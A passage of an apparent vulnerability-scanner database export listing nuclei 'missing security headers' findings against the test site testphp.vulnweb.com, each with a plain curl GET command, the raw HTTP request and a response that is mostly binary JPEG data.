"HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4615\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:58 GMT\r\nEtag: "4dca64a1-1207"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0002\u0003\u0001\u0001\u0001\u0001\u0004\u0005\u0003\u0006\u0002\u0001\u0007\b��5\u0010\u0002\u0002\u0001\u0003\u0003\u0002\u0005\u0002\u0005\u0003\u0005\u0001\u0001\u0002\u0003\u0011\u0004\u0012!\u00051A\u0013Q\u0006"aq�\u0014�#2B��R��%3���b��\u001a\u0001\u0002\u0003\u0001\u0001\u0001\u0003\u0002\u0005\u0004\u0006��0\u0011\u0002\u0002\u0001\u0003\u0001\u0006\u0005\u0003\u0005\u0001\u0001\u0002\u0003\u0011\u0012!1A\u0004\u0013"2Qq\u0005a���3��\u0014#Rb����\f\u0003\u0001\u0002\u0011\u0003\u0011?K4�5���\u001d�Ô\u0012I�?�#Y6��^�s`\u001f��# 2�#Ag��&V\u0016\u000f���:����'���02t��>\u001cnX3P�W��s��D�-���#�&8�3���q�\u0011�A�4\t�����0+���F�!�4�"��#�)c�\u0002�\u001b�zTZ��Wo\u0015�<s\r��\u00159D��&�\tRտ��\u000b�kZ$�������Z��>�{�rB�2�]�U]�wy \u001f\u001d���\u0010~�\r\u0006�K��ۊ�k�~����8\u000f��~fI\t\u001b�\u0015D\u001e���\u001d<�+\u0014(�v\u0002�j\u0003�?(Xi�|��RZ\u001e�C��o�.\u001e)w ! 3n\u000b�\u0013E���agU˔#BX�\u0002����=M���\u001a�}�\u0006�\u0002�=��\u001c��ca̭I���!�\u0003�N�Y�\u0019�0UdK��\b'��U����m��^>�Q��\u0012*��Q�\u000f\u001ac\u001c�\u0005�F���*�\\�4����ՆP\u0007<~t��U\u0014�2�<�gz��\u000f$Y���e�\u0006�?3\u0003�\n<v���X\u000e`U,p&�7�C\u0017�cW\u0006hP3/��[=�?�f\u001aL���"��ʑ��r�,�\u0015�*�\b.�"�$�\u0016{�\u0018="l����v��l�<�U#��I�r�x��ֶ�/�A�\u0015�C� BĒhj�-�g����\u0007�Г4���CL�\u0018\b��(�h�\u000by\u001c�B�\u0017�f&<pƱ�\u001a�(��(\u0001�5\\*\u0005\n�q�:��\u001bE\u0016&\\�����Q�\u0013�utg��}����\u0003��\u0019?��\t\u0014��@�\u001e,�����鼓n]/���U܄���Z\u0007��:[�ԃdK\u0004��e'bHl���s]������:\u000e�\u001c�ގ�9�?��U\u0010�)���:�\u0003+P\u0004��aF�X�<\u001b≩��0A��\u0003��X]O!�\u001a\u0003���A�H����6���{\u001f�T6�Ǭgvl�\u001e�[���X\u001c����\u0007=���o�M��/}f����W�\bn��8���\u0016"I�/A\u001b\u0005�������<��uy"R�ŀ���������\n\u001cԺ�t���,孨\u0011�P�A�\r��\u001a+3;ч��F;T{��[�����\u0016�V�6�uL��e��\nۈ,YX���?��N:.*b@����Q5}�������\u0007Ցi��}�������\n;��ד�h��/�Ӂ���9hw\u001f[���\\\\92_w��\u0010��\u0018�\u000b��\u001f�'��w3��8\u0001Yop\u0006ڂ�l�+C���:��r�t`zLV�A�|\u001f�\u0003��\u0002;\u0017�D�mm���\f̾���@�B7)��2�H��Ǜ�\\\u0011VF�};�'��L*@ۈV4O�ߑu��p1��ُ\u0018E�hw>��?]<��\u001fM\u0010�L�f�Sa\fƌ\n}t|_���15F����\u000e�\u0015\u000fSD\u001d^�\\��\t(\u001cX�j�:�:�\f�\u0018�y\u0007]�\u001fm#��`��S#*\b�@f\u000e�\u0015_sΪ\u001dy^L��\t�1Ŵ���k�7|7\u0015|}E���#3�#29�r8`{Q�΢\u000f�!�F$e۸�\u0018Ճ��<w\u0014k��uFN\u0013㱓\r�Ѱ��\u001d��·l�U&�r=��GϿ���ͦ�4�:�9�C���O��\u0015Z\u0012|�\\�$�\u0016b\u0015bI \n\u001c���^uT��f!��!�V��Uoɮkށ5�\u001e�\t�W�3(,�~`�F������k,���o4��r80����3��7Uλ���\u0015\u0001��;�\u001et�ى�����\b>ڂ^E����M�����@\u001as�=ŘC�\u0001�(�p�˘ϐ���)��"�<�0�z�7ȡ����yI\u0004b��{��8c��s=%A�&h�u�-�\u0001���3��f�\u0011���k�#��\b\u001d�滊҈D��z��+���O��cP\u0007a�x\u001fm<3Y��g�%\u001b�������"a,�|���k\u001e\u0001�kM�\u0015h\u000eݴ�\u0019UG}^z�\u0011r�(\u001e�k���\u0014N&f���4p����`<��.\u000f�Rf\u000b\u001cr��LE��\u0004w�a�\u0013;�d�$X�\u0018�o�($���A\u001e���\\���t��[��q'P�\u0014/,����I�\u001a\u001e_�q��#74I`E-{�?��F�\u0011|?��\u001eJL\u0015\f��.@!d\u0003�\u0006���oO��me��t��1���8 �5�>��~u\u0001c�B�93����pS\u0019\b���\u0003nu䊢;P����S'&N��2"���\u0006W��G�<��\u0011‚ǎIZ�l?��\u000f\u001b\u0010�\u0005YV�c\fB�\u0015��\u001am�Ӡ�%H�DU�ÿ���\r$�dր�D��bu\u0003�,�2\u001c��匨X���!,�\u0018�\u0017d\u0011\\�\u001ac��\u001b����dIe�(\u001fP�IT�qUVŅ�<\u000f�:�E\n�8�H�x�Um+�\u0006֟���p�_P�'�#��\u001a\u0007*e�9\u0004r\u0015\u000e�[k0��}�P~�L�V'\u00042���<��A�v��H}x��\u0013_�����\u0019L�B��X��B\u0014\u0005RV@K\u0012�KpG�\u000bDrh��3ʞN�xZ�����\u0006��VyY�o�w\u0010\u0016��\u001a�\u0011L�"���\u0005\u0004�s��s�>�y�m6���8��K0�"X��[Q�\u0016\u000bE�$�#q�g�\u001ck±�Ħ�*�һ�\fy#m\u000e,7�6\u0001��}#�\u001c���,����U��6ڀ���FGs��8\u001bZ�Zڋ�t�\u0017�,�\u001a��z�Wj7���UR��s@�\u000e\u0015\u0012\f�A�j����\u0013,H;�%\n��\u0016,_o���^��]�0�G�6��\u0014�n�\u001d�:�*_\\��1y�|��\u0004aM�v�F�B�_j��(�\u0006��o^���\\\r�����23\u001e�e�\u001d\u0013p\u0004�\u0004�\u0007�<\u000f�\u001a�3�$\u0003���\u0007��m\u0005�\u001cKF�>羝c\u0015\u0015ڵ���'\u0013\u001e��v\\�� �͖�䊾�(�<��8}\u000e\u0012�g&m����#��\u001f�����u��4Ǒx�N\u0015/]�s��\u000e�ohN/O�y1!n9e��7�\u0018�(�\u0006�Ǖ}��a\f����\u0004��a\n\u0001㶎�@ \u001f���ƍ��\u0007Τ���\u0017�\u0010@�18��\u001d\u0017\u001bX\u001e�BH\\c������܂4B\u001e~�\\։\u0004��?MP��I\r��ݹ��z���I� wfc�\u0015\u0014Y��@{\u0001��4ר.Yp�4E\n#�V$|�\u001bo4l]\u001e;���̼KT2wT��\u0013�\u001b?1���\u001e\u0007�IuR<+7������!{\u0010O�\u0013\u000e�3Y\u0016D�cb\u0003�a[�\u0018X\u0006��\u0001�ڹ\u00122[a�\u0007������\u000e\\,eґAU!@�߸\u001c�7ި{k\u000f��}Y����٢�\f\u0018ϰ|\u000f��_\u000f┃\u001f�ފ%\rD_'r��\u0004W\u0017ߛ�1�\u001bu\u0015�̝�(��]�T\u0016�l��Ln��\u0015Wܒöc#v8�9m\\��\u001bQ�Bֈ�]��^�9\u0001�.ϕ���N�ş��ן���l�&����p72��ܮ\t\u001f�T��n;\\M\u0005&�er�\u0006�E�n�Q<v<X44:\u0002Ɖ�{��h�@G��U��Q���1�O�Y�u��0ر\u0016p7\u001d���^O���������^�WƂ�,�N�N��I�L�:�%\t��������d\t�\fL���P�\u001d\u0016\u001c�#\r1eC`m\u000bb��U���ǁE&&zez���\u0018(P�[�\u001b6�7F����p5~\u0014��\u0001FR=��|`\rk�T��e�h�>/�H�}Y\\��qH�G�\u0001~/p�o����&���\u001a)V4�\u0004J�\u000e��\u0018�E\n<��^�ֆ\b�\u0003�\u001d\f �����̯~O L�?W��#�VV�f�dJ2P;��;�U\n�Y���:�x\u001d>6�7�-��V2ށ,F�7\u000f��أ}�j#�R;\r\\�>\u0016]�1�p<��>�w��1\f\u001f\u0015��4%�\u001e�V(��捀A\u0006��{���\u001f�P�\u000e>T�\u0015�r\u0002:�b�\u00057`\u001e\t����ӡb��#GUz�\u000e�h\n\u0003m�\u0001�@d�\u001b�4\u00016��x�<J\u0002�c�)a`\u001a&�w��\t\u0001����~ M�n�u����3�{\u001a\u0004�{���Lq��,��\\�\t��SI�S{\u001b�G�\u000f���|;!�\u0010���&r.�*�T[\u000e~m�h_��F�\u001d\u0003��VwM��9�I�4��ƕ\u0003!<w#m��}��\u0016\u000eO"@�zϞ�<p#3��)=\\�\tP���[���0�!\f��#J״�`S�<|��W�1�ۜ�H",h*�:S)}��u�b�p����D#\u0001{�\u001a��B�\u0006�;��4X�\u000b~M\u0002k�\u000e�?O���6@BѻF�\u001c:�5`�D\u001a���m\u0005�\n�H��\u0003w\u0002�����bj\\�\u0007��t��]���x�Z3HСD%����T�\u0017B�\u001e��v��\u0002��[�B>cc�u�P�|���˃d����\u0015����\u0016@;\u001et���I q���\u001c|���J���CL��1�%@�B��\b\u0004�5�\u001b\u0017V<�8��#�Q\u001364�E#Fɹ\u0018���k\u000e<\u0010H#�$jΒޤ~���S�������Z�:\u000f\u001d'5����zs;�Ӥ��6�\r\u0015$i�⤠nE?q���sK\u0019h\u0018�( �5d]_﫺fw�L\u0019$�k�G�\\��ЧO��m�1�����\u000e��H���\n��x\u0004]�}���<���$0ώ��\u0010�B7314\u0015Tr����c�j���\u001aJ�]A\u0017tG�\u0007L����s�嶰g�8��W\u001f"F�\\\t\u0013�S��_c�:���GYy�\u0002z��\u0011;U���\u0001I��]�w�گ�d�t��Xs\u001d�fW��\u001c���x\u0004X�/�W����D\u0005\u0015�C7�U����p+β]\u001b�<l�}Rޒ\u000b�C]�\u0007����@�bN�"20e"�\u0006�\u001a� �\u0014�T��\u0011�>8�\b�����������Q��\u0010N�;�\u001a�b\u0007ƺQgV��^5�e�B\u0004��Ƞ\u001e5��$�Ա�؟I�\u0012\u0001�������u�_���\u001d��~�\u0018Ѫ��Ҝh���1�A\u0013�\u001bA�����/����_�U�cV��\u0007�m_�\u00188S�@����SSUn\u001b��p>Oβ�\u0001���3�\u000fU����\ba�\\��SSV>E�J�����,u\u0006���:�\u001cO\u0003�\u00048B������Ӝef}$�\u0006=e�\tf˗��Z�m���ε���\u001a��)�\u0010\\1a\u0002\u001f\u0012�;k��\u0018��\b�����ՌX�ez�\u0004\u0011u���������=F\u0006�,\u001d��\u0004�菅sr'N�,�10亠�Ty�ۏmMM$y�='[oW��3W��T��}'\u001f+$ ��$( p�{�5���ښ�a�r�&\u0018�ͫ�󩩮\u000ba\u0013��", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 916, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36' 'http://testphp.vulnweb.com/pictures/3.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/3.jpg.tn", + "discovered_date": "2024-11-13T02:42:25.326Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/3.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 3725\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:42 GMT\r\nEtag: "4dca64a1-e8d"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0001\u0004\u0003\u0001\u0001\u0002\u0003\u0004\u0005\u0006\u0007\b��2\u0010\u0002\u0001\u0003\u0003\u0003\u0003\u0003\u0003\u0003\u0004\u0003\u0001\u0002\u0003\u0004\u0011\u0005\u0012!\u00061A\u0013"Q\u00142a\u0007q�\u0015B�\b\u0016#3C����\u001b\u0001\u0001\u0005\u0001\u0001\u0002\u0003\u0005\u0006\u0007\u0001\u0004��2\u0011\u0001\u0003\u0003\u0002\u0003\u0005\u0007\u0004\u0003\u0001\u0002\u0003\u0004\u00111\u0005!\u0012\u0013A\u0014Qaq�\u0006"#����2���3R���\f\u0003\u0001\u0002\u0011\u0003\u0011?��W�z�M.�wow\n�C$\u0012��\u001b�2\t�\u0004\u001f��V���\u0013u\u001b;6���Ŏp6�I�l<����I$�\r���xU�/E�]���\u001b\u0018\u0002�\u0010I�8\u0002�_A��\u001f\t;7�^�J��\u0013^\u0006��MB��N�M�]�k\u001b0Ei�\b\u0019���54R$��\u001c�b��\u001c�����V�}���&�ng�\u001at���\u0010�V^�\u001eB7���܌��\u000b�д\u000bk\u0013!���#\u001a��\u001f��\u0017�\u0018��@\u001cq��x��C��2Xn����^W��9��,\u001a=J�\r\u0015��[�V��N�n./u\u0012�\\Or-�F���\u000b�\t����v\u001cg<F*\u0012��JYLR\rǟ�KST����E\u0014Q^e��c\f\u001aJy\u0019�+�\\�t8&�JF)+�h��(B(��\u0010�F))�)���M�QE\u0014%-#���<u|�q��,�\u000e\u0016(W�.�� �(9��!N\f̀�\u001d\u0002H����1��#��j�]��6\u001a��픆+�w\u0012D�\u0003�����G��u=\u000b�r�!D�4��p�5�\r��\n6����\u000eq��\u0003�6��h���ψq\u001e�\u001f�UA�k�J8/a��wS�6�\u0010�\u0015\u0002M�㴞\b����|V\u0011\u0014*\r�\u0011K���Υ�b�\u001a�����\u0015\u001c"�\u001c��\u0005\u0001�)9�\u0004\u00023��\u0003Vnt����,��\u0018\f�,�����\b����;�T\u0018#4�\u0003��$_��Lj�s\u001fτ�\u0003�5F�e}^�錛�˹Q�ܟݸn\\�2pI�\u000e\u0018��p�A\u001bD�$c+�\u001bP�\u000e�r�}�ی�2@�+E�X��l��I$�\\͈�1�\u0018.�\u0005���\u001cs�c\u0007�n�\u001f�\u0012K�Y�\u0017��\u000eO�6\u0001 \u0012pH\u001cx�5\u0013�hkj�����^�\u0003�і4�T��\u0019쥺{�B[�=�<\n\u0010 �\u001d�m9ov�y�\u0003�;�[Qm+�fԯ`\u0002HmIJB�\u0002\u0015����\u0001��8���\u00157�w���RH�/��nTz��\t��;C�\u000f\u0019\u0007;\\�����Ҽ��29\u0006H\u001bm�:)��{\u0014%�w��4\u000f�{�R�K\u001b�)R{���KA��y\u0019U)�� n%�p2ɮ���4gP�@%Cn�|���s\u001e���=\u0002���L�wH���\u0005Q���B�\u001carX�[�\u0018�^X�Z��\u000fy�R���n\u001e�\nѤ��$3����.s�d`�\r�U�\u0004��\u0011�1����\u000b�|�T\r\u000e���#��zӲ��dRm��-. �����x�`q��7WW�\u0019\u0004py�KTw���\u0015k�^&�\u0014dc�\u0015!\u0019�L#\u0014�\u0013�u�QE\u0015ĤS[�:���Rٔ�QEq8��\u0010x�>�\u0016ݣv{�J����wY\u000b��E@op\u0007\u001f4G4��,���J����YO��G�J�u1�p�\u0016�������:�]Һ��P����+i\u000b<\u0013�;�\u0002\n����c������2\u000b��m6+�\u0016�\u0019��\u0006H��2�\u0006�\u0002�\u0005H�H'#\f8��f�w��t���t�7���`��Z\u0003�����x\u0004�\f�q���ƈ+�|f�\u001e�R��@w����>$�2����h��P\u0010v��\u00078� \u000e\u000f\u001c5c���x`\u0019&\u0017b_�y \f\u00021�ry>\u0006\u0001���L~�麪J���:X��\u0018�2����l(,s�q��8�ߤ���^�]\t��\u0005e�\u0010\u0006��;�a�\u001d��L��g\u0015V��梮��45����c�u3Y<U\u0014�\u0010�\\G��(��\u0004S.S�v�)]�8?�T���U��6�g;U\u0007���\u0007�p+Ch?��eN�͂�z\\[\u000b\tV�=1\u0011f!��\u0018݁��+��O\u0003�\u0006Z����els\u001cq�����}�\u0003\u0005����\u0005\fFv��S�\u001dr�D��9��k���O\u0004!w˳n�\u0016*�\u0001��\u001d��\u0003�U5�uN�6�&�B�{i�h���e)\u0018dS��\u001e\t\u0019�\u00185\u001eA\u001b/{\\\u000e�EE<�0�\u001aE��������Er�a�$�\u0018���.�\u0015��(��u�$`\r7a��B\u0001MU\u0002�{=-�}�5^�q�(\\7)�3Y�#�5-\u001e?B�oRɑ����z���I]��;�v���TG����9��#A\u001e)��|f�6+���z]�\u0015�ݴ��͆��FSϴ��mĀ�\n\u0014}ÀvΐV��$��E��\b\u001d�d�z{�l0���A�\u0018\r��+�S�\u0015���̈:;U�\u0018��o�C\u001e��\fH\u0014�9�nq��\u001a��\\�Z\u0007�<c�\u001f\u001f�{�c\u0012�\u001er�\u001d�P�@��E\u001c��+�W�k�^?\u0004\u000f��S��M�\u00078=����Hc�y�� S#���\t��o�{)$g `�dR�-��b\u0002��\u001d(!^��L�\\�Z\u0005����J�,ņ\u0006;\fg����ߨ�a��ԗ\u001af�,Q�X��n�\u0004�%�9\u0019V�;�3�\u001cv[�k\u000b)�YA�����A�\u0019��\u000f��\u0016��\u001a���s~>�c{q$�4r\b�"�IȐ�<�Kc䚶�3Hǽ�5\r\u0016h�����Z�Ao���[WGu����jVs�(�}5�.^\u0010�\u00138bQ@]ː9<�}�kg�\u001f\u0007k.@8a�23��kJ�.��Ӭn.���P��E\n�\u001cl�\u0018����p�x>�ʫ)\u0015�A\u001b��Y$���Ycm�c�\u0018\\|g�{��Q��Բ�YL�X��\u0002�w/~�\u001c��:glz}n��\u0014����eWJ�n�\u0014QE\tK��S�?�\u001e���e��2�~����~(E�h��w���Tl�⤢�\u0003eRH�v��@�\u0004�3�\t<e~���W\b��vn\u0018n\u0001�y ��\u0012��G\u0016��)�6ޙ �������3\u001b��?\u0014�7\u0002\u0017�l��Դ�.QU��E�#�~8#8$g���ޑ-�^��Kp���aLͱG~\u0013;s�8�'�q\\�􃨮.\u0012]\u001a�帒\u0012\u001a\u0007 �H�\u0014�\u0003\u0001U��'�'\u001c\fV��j����Z��%\t\u001eb�Uf�;\u0010�X/%w0�9�k*�����4;���\u0015ޒx*!�:�\u0019X�n�^�%�\u0001�0�F�I��\u0018��8 \u001c��d2�\u0007���ŧY�a�8�t��Q\u0019db��\u0018��I\u0018�rN1��V8�\u0015�QD�Jv���\u001fUI������D�K[�qf���*�m\u0004�\u0019�?8�#=�Z����.��I�C��b��\u001c[��#ö<n\bW�\u0005��8 �9��6IP�\t���yq\u001c��7PA��=��\u0015�0 1�+s��2\u0006pO��*�9.����d��=R�d<��\\��\u001f��l���\u000f�ț,\be�q�8$v�<g�\u0017�y���M�ҭ�./�`N@P\u0019�\u0004�\u00120q�ۃ�v\u0016\u001b�"��Ťv2q���ѩ��\u001eI(��ez\u0017������F�(��$�(?ju\u0015�ۨ�~iʠS��Ⱥ\u0001 �RJŁ&��v���\u0005\u0001:\u000b��+������>U���ߐFA\u001eA"��D�V}C���\u0005\f���wo'��\u0019'i�T��|�������\u001c�CE֯�[�u�ʊ���H�ш�q�\u0016\\�\u001c3\f�j\u001fX�;|<,6p�|���ON���]���Wf�ڰ.�Vu \u0015�\u0006\u0016@G�9<\u001e���\u001d�����Giz�Ŕ:��ۥ���T��h��z��\u0006=�vFs�r\t�4�s^�7��Ý�\u0011�FW��>T�\ft�V$��O�[����\u0013\bcc#M\u0004�\u0019W����Gܮ\u001c��\n~r(i��jw\u0006\u0018Z<�/���F��x\u0007\u0004�b21��m�u�XZ�*�Fھ��ҰEM��$*������c���D}��RzE\u0003��H���a��\u001a�{�0���s����2�(��ך�\u00063ڢ����F�(��"�(�\b��(Bl�mEE\u0015Ġ�\u0006�'=袄���\u000e�w�j�wd�:�Y\u0018e%O(�ʜv�\u00020@5�:�6WWqDIX����q�E\u0015�n�\u0007����x�ߴ�+m6��e\nč#;rX�\u001e�I$��w�\u0006�\\0\u0017�7��U\u0003\r\u0018\u000b��\u0011��9\u0018�\u0004w�<`��Ⱦ$�/����*�rțö>�W��\u0013�O.�=�П�.�\u0004\u0001��c�Y!\n��Wv�v�\u0019e\u0007�\u0015��f��ӧ��mn����B������8ݑ�؁��<`��(�:��\u000f�L�Od�����1��igw|��)��\u0004��\u00078����;�98�@�E\u0015\u0017�1���E�\u001f`�����\u0002�}���", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 917, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testphp.vulnweb.com/cgi-bin'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/cgi-bin", + "discovered_date": "2024-11-13T02:42:25.541Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /cgi-bin HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=iso-8859-1\r\nDate: Wed, 13 Nov 2024 02:41:39 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access this resource.</p>\n<hr>\n<address>Apache/2.4.46 (Ubuntu) Server at localhost Port 8000</address>\n</body></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 918, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36' 'http://testphp.vulnweb.com/pictures/7.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/7.jpg.tn", + "discovered_date": "2024-11-13T02:42:25.755Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/7.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 6458\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:21 GMT\r\nEtag: "4dca64a1-193a"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0001\u0005\u0001\u0001\u0001\u0006\u0002\u0004\u0005\u0007\u0003\u0001\b��6\u0010\u0002\u0001\u0003\u0003\u0003\u0002\u0004\u0005\u0002\u0007\u0003\u0001\u0002\u0003\u0004\u0005\u0011\u0012!\u0006\u00131"A\u00072Qa\u0014\u0015#q�B�3CR���������\u001b\u0001\u0003\u0003\u0001\u0001\u0004\u0005\u0006\u0001\u0003\u0007\u0002��0\u0011\u0001\u0003\u0003\u0002\u0004\u0003\b\u0003\u0001\u0001\u0001\u0002\u0003\u0004\u0005\u0011!1\u0012\u0013AQaq�\u0006\u0014"2�������\u0015B��\f\u0003\u0001\u0002\u0011\u0003\u0011?��I�KMc��������^�ܡ�y!�2��w\u0005c�ϓϑ�\u0019�|x�\u001bT]K=$4n�2�\u0014ʌb��\f�\u0018,1φ�G�Qz~��=t�W�\u0002\u001aF*�O0uw�G�����|��q�7<6nI��<��\u0012)]%?��@�\u000ez�q���\u0014\u0003�s�j~��E ����μ��\u0017�Rׄ�H�7Y_$�5��T��\u0018Bʤ���������}\u001d�&�#R���O�d>�� y�\u001c��\u0007VR\u001c�\u0001u�v�4*Q�\u0018�� ���ަ\u0003\n\u0014�;���\f�ppt5\\��a�l\u0006��:�L��\u00059\u0007$�5ǧ�3����i��vb`�J�d�\u000f��jNﶃ:B�u�)�2\u001fS;�\u0014�"�İ�\u0007r�\u0004K1\u0003h�\u0003:.W��Y���;�w\nCI9������\tϝ3w�H��D�p�f�y�\u000b\rp���\u00171�~\u000e7x϶uWCw�D�\u000b�\u0012E@�\u000e�\u0018\u0012FAR}���\u000f\u0007\u0004\u00105:V���r����0�ѐ7W\f��\u0017n04� o}r�N>��+\rb�':�6Ll\u0011��8lx�Bt���c+[����\u000fIt�j�Y!��!�^�qʑ�,{�疉q�_�����d\u0014��G$P��\n\u000eԳ��\r�R����<g\u001cx�]�H�\u001dT�J�VشQ��l�dd�\u0003$g*\b\u0004��:�r�\u001bg�M$�\u0004h����V�Km\u0018珮F�E\u001bc����\u0018�󟲧�Ϛ�\u001b �S�v�������\u000b�\u0012�\bc}�PHq��������KQ\u001cK�WD\\��8��\u000f�Ӭ��R��i�#U+:Y�JJ���2B��\fW 